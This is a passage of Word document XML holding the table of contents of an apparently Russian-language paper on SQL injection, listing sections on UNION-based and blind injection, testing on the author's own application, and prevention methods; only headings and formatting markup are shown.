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rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="172132631"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00EB5DBA" w:rsidRDefault="00EB5DBA">
          <w:pPr>
            <w:pStyle w:val="ab"/>
          </w:pPr>
          <w:r>
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00D94490">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D94490">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EB5DBA">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00D94490">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc420789642" w:history="1">
            <w:r w:rsidR="00C17C3D" w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789642 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00C17C3D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789643" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sql-Инъекции</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789643 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789644" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Алгоритм выявления возможности внедрения </w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789644 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789645" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Алгоритм внедрения </w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода с помощью Union оператора</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789645 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789646" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Алгоритм внедрения sql-кода с помощью слепой инъекции</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789646 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789647" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Применение внедрения </w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода на собственном приложении</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789647 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789648" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Способы предотвращения sql-инъекций</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789648 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789649" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>1) Использование параметризованных команд</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789649 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789650" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2) Использование хранимых процедур</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789650 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789651" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3)Проверка всех данных, вводимых пользователем</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789651 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789652" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>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_Toc420789652 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789653" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>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_Toc420789653 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789654" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789654 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789655" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789655 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789656" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789656 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789657" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789657 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C17C3D" w:rsidRDefault="00C17C3D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420789658" w:history="1">
            <w:r w:rsidRPr="000E34A1">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
